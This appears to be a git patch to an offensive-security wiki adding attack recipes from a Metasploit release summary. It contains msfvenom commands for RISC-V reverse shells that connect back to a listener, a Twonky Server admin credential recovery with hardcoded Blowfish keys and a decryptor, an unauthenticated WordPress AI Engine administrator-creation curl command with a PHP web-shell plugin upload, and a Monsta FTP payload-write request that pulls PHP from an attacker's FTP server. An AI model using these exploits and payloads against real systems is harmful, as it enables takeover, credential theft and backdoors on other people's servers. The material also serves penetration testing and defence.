From 1c394695b3ffde8945d9e9903a315483a97ac4fd Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Sat, 6 Dec 2025 01:38:19 +0000
Subject: [PATCH] Add content from: Metasploit Wrap-Up 12/05/2025

---
 src/generic-hacking/reverse-shells/linux.md | 23 +++++++
 src/pentesting-web/account-takeover.md      | 74 +++++++++++++++++++++
 src/pentesting-web/file-upload/README.md    | 31 ++++++++-
 3 files changed, 127 insertions(+), 1 deletion(-)

diff --git a/src/generic-hacking/reverse-shells/linux.md b/src/generic-hacking/reverse-shells/linux.md
index 8fed81905f1..2896cdc2f0a 100644
--- a/src/generic-hacking/reverse-shells/linux.md
+++ b/src/generic-hacking/reverse-shells/linux.md
@@ -420,6 +420,28 @@ String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
 
+## RISC-V inline reverse TCP shells
+
+Metasploit 6.4.101 introduced single-stage reverse shells for both little-endian RISC-V architectures. `linux/riscv32le/shell_reverse_tcp` and `linux/riscv64le/shell_reverse_tcp` are position-independent shellcodes that open a TCP connection back to your handler, `dup2` the socket over stdin/stdout/stderr and `execve("/bin/sh")`—making them perfect droppers for memory-corruption exploits on emerging RISC-V appliances.
+
+Generate artifacts directly from msfvenom:
+
+```bash
+msfvenom -p linux/riscv64le/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell_rv64
+msfvenom -p linux/riscv32le/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f hex | sed 's/../\\x&/g'
+```
+
+The second command emits escaped shellcode bytes you can drop into a ROP chain. If you need a traditional handler:
+
+```text
+msfconsole > use exploit/multi/handler
+msfconsole > set payload linux/riscv64le/shell_reverse_tcp
+msfconsole > set LHOST 10.10.14.1
+msfconsole > run
+```
+
+Because the payloads are inline, no staging channel or filesystem write is required—just copy the bytes into your exploit buffer and trigger execution on the correct RISC-V bitness.
+
 ## References
 
 - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
@@ -428,5 +450,6 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
 - [https://github.com/robiot/rustcat](https://github.com/robiot/rustcat)
 - [https://github.com/emptymonkey/revsh](https://github.com/emptymonkey/revsh)
+- [Rapid7 – Metasploit Wrap-Up 12/05/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025/)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md
index 9e9169fb8b2..ab6886393f3 100644
--- a/src/pentesting-web/account-takeover.md
+++ b/src/pentesting-web/account-takeover.md
@@ -149,10 +149,84 @@ This also happened in [**this report**](https://dynnyd20.medium.com/one-click-ac
 As explained [**in this post**](https://medium.com/@niraj1mahajan/uncovering-the-hidden-vulnerability-how-i-found-an-authentication-bypass-on-shopifys-exchange-cc2729ea31a9), it was possible to login into an account, save the cookies as an authenticated user, logout, and then login again.\
 With the new login, although different cookies might be generated the old ones became to work again.
 
+## Twonky Server log leak → administrator takeover (CVE-2025-13315/CVE-2025-13316)
+
+Twonky Server 8.5.2 exposes its maintenance logs via `/nmc/rpc/log_getfile` without authentication and logs the last successful administrator login as `accessuser=<username>` followed by an encrypted password field (`||<key_index><hex_ciphertext>`). Because the encryption keys are static, the leak becomes an admin credential recovery primitive:
+
+1. **Fingerprint the build** with an unauthenticated `GET /dev0/desc.xml` request and confirm `<modelNumber>8.5.2</modelNumber>` is returned.
+2. **Download the logs** with `GET /nmc/rpc/log_getfile` and parse the newest `accessuser` entry plus the trailing `||` encrypted blob.
+3. **Extract the key selector** (the nibble immediately following `||`) and the remainder of the ciphertext. The nibble indexes one of twelve hardcoded Blowfish keys compiled into Twonky.
+4. **Decrypt the password** locally and strip trailing null bytes. Twonky stores the credentials as plaintext after the Blowfish operation, so no extra hashing is present.
+5. **Log in as admin** over HTTP with the recovered username/password pair to reach all media-server management endpoints.
+
+Typical request to retrieve the leaked logs:
+
+```http
+GET /nmc/rpc/log_getfile HTTP/1.1
+Host: twonky:9000
+```
+
+### Decrypting the leaked password
+
+<details>
+<summary>Python Blowfish decryptor</summary>
+
+```python
+from Crypto.Cipher import Blowfish
+
+STATIC_KEYS = [
+    "E8ctd4jZwMbaV587", "TGFWfWuW3cw28trN", "pgqYY2g9atVpTzjY", "KX7q4gmQvWtA8878",
+    "VJjh7ujyT8R5bR39", "ZMWkaLp9bKyV6tXv", "KMLvvq6my7uKkpxf", "jwEkNvuwYCjsDzf5",
+    "FukE5DhdsbCjuKay", "SpKNj6qYQGjuGMdd", "qLyXuAHPTF2cPGWj", "rKz7NBhM3vYg85mg"
+]
+
+ciphertext = bytes.fromhex(enc_pwd)
+key = STATIC_KEYS[int(enc_key_index, 16)]
+plain = Blowfish.new(key.encode(), Blowfish.MODE_ECB).decrypt(ciphertext)
+print(plain.rstrip(b"\x00").decode())
+```
+
+</details>
+
+## WordPress AI Engine MCP unauthenticated admin creation (CVE-2025-11749)
+
+The AI Engine plugin exposes a Model Context Protocol (MCP) API under `/wp-json/mcp/v1/<token>/` that maps JSON-RPC calls directly to privileged WordPress functions. Versions ≤3.1.3 never check authentication, so an attacker can mint an admin account and then abuse the normal plugin-upload workflow for RCE:
+
+1. **Enumerate the MCP token** by fetching `/wp-json/` (or `/?rest_route=/`) and parsing the routes for `/mcp/v1/<token>/sse`.
+2. **Create or update an administrator** by POSTing a JSON-RPC request to `/wp-json/mcp/v1/<token>/sse` where `method` is `tools/call`, `params.name` is `wp_create_user` (or `wp_update_user`), and the arguments contain attacker-controlled credentials.
+3. **Log in to `/wp-admin/`** with the freshly provisioned account and reuse Plugins → Add New → Upload Plugin to deploy a PHP backdoor.
+4. **Activate the plugin** or directly browse to its endpoint to execute commands as the web server user.
+
+Unauthenticated admin creation:
+
+```bash
+curl -k -X POST https://target/wp-json/mcp/v1/<token>/sse \
+  -H 'Content-Type: application/json' \
+  -d '{"jsonrpc":"2.0","id":1337,"method":"tools/call","params":{"name":"wp_create_user","arguments":{"user_login":"aiadmin","user_pass":"Passw0rd!","user_email":"attacker@example.com","role":"administrator"}}}'
+```
+
+Minimal malicious plugin packaging and upload:
+
+```bash
+mkdir ai-shell
+cat <<'PHP' > ai-shell/ai-shell.php
+<?php
+/*
+Plugin Name: ai-shell
+*/
+system($_GET['cmd'] ?? 'id');
+PHP
+zip -r ai-shell.zip ai-shell
+curl -k -b admin.cookie -F "pluginzip=@ai-shell.zip" https://target/wp-admin/update.php?action=upload-plugin
+```
+
 ## References
 
 - [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
 - [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
 - [0xdf – HTB Era: security-question IDOR & username oracle](https://0xdf.gitlab.io/2025/11/29/htb-era.html)
+- [Rapid7 – Metasploit Wrap-Up 12/05/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025/)
+- [Metasploit module: gather/twonky_authbypass_logleak](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/twonky_authbypass_logleak.rb)
+- [Metasploit module: multi/http/wp_ai_engine_mcp_rce](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wp_ai_engine_mcp_rce.rb)
 {{#include ../banners/hacktricks-training.md}}
 
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index 9d0d3ef4710..31f5fe4ee5a 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -525,10 +525,37 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 - **`pdflib` library**: Add a fake PDF format inside a filed of the JSON so the library thinks it’s a pdf (get example from post)
 - **`file` binary**: It can read up to 1048576 bytes from a file. Just create a JSON bigger than that so it cannot parse the content as a json and then inside the JSON put the initial part of a real PDF and it’ll think it’s a PDF
 
+### Monsta FTP downloadFile arbitrary file write (CVE-2025-34299)
+
+Monsta FTP < 2.11.3 exposes the `/application/api/api.php` endpoint, which accepts unauthenticated `downloadFile` actions. The request lets the attacker fully control the remote FTP server, credentials, and the destination path on disk, so you can turn the feature into a pre-auth arbitrary file write that lands PHP payloads right under the Monsta web root:
+
+1. Stand up a malicious FTP server (the Metasploit module spins one up automatically) that serves the PHP payload when `/payload.php` is requested.
+2. Send a `POST` request where the URL-encoded `request=` parameter contains JSON instructing Monsta to connect back to your FTP server and download `/payload.php`.
+3. Set `context.localPath` to a web-accessible directory (for example `../application/api/<name>.php` under the Monsta install) so the payload is written with executable permissions.
+4. After Monsta reports success, request the uploaded file over HTTP to execute commands as the web server user.
+
+The JSON structure embedded in the `request=` body looks like:
+
+```json
+{
+  "connectionType": "ftp",
+  "configuration": {
+    "host": "10.10.14.2",
+    "username": "pwn",
+    "password": "pwn",
+    "port": 2121
+  },
+  "actionName": "downloadFile",
+  "context": {
+    "remotePath": "/payload.php",
+    "localPath": "../application/api/avatars/evil.php"
+  }
+}
+```
+
 ## References
 
 - [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
-
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
 - [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
 - [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
@@ -546,5 +573,7 @@ How to avoid file type detections by uploading a valid JSON file even if not all
 - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
 - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
 - [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)
+- [Rapid7 – Metasploit Wrap-Up 12/05/2025](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-12-05-2025/)
+- [Metasploit module: multi/http/monsta_ftp_downloadfile_rce](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/monsta_ftp_downloadfile_rce.rb)
 
 {{#include ../../banners/hacktricks-training.md}}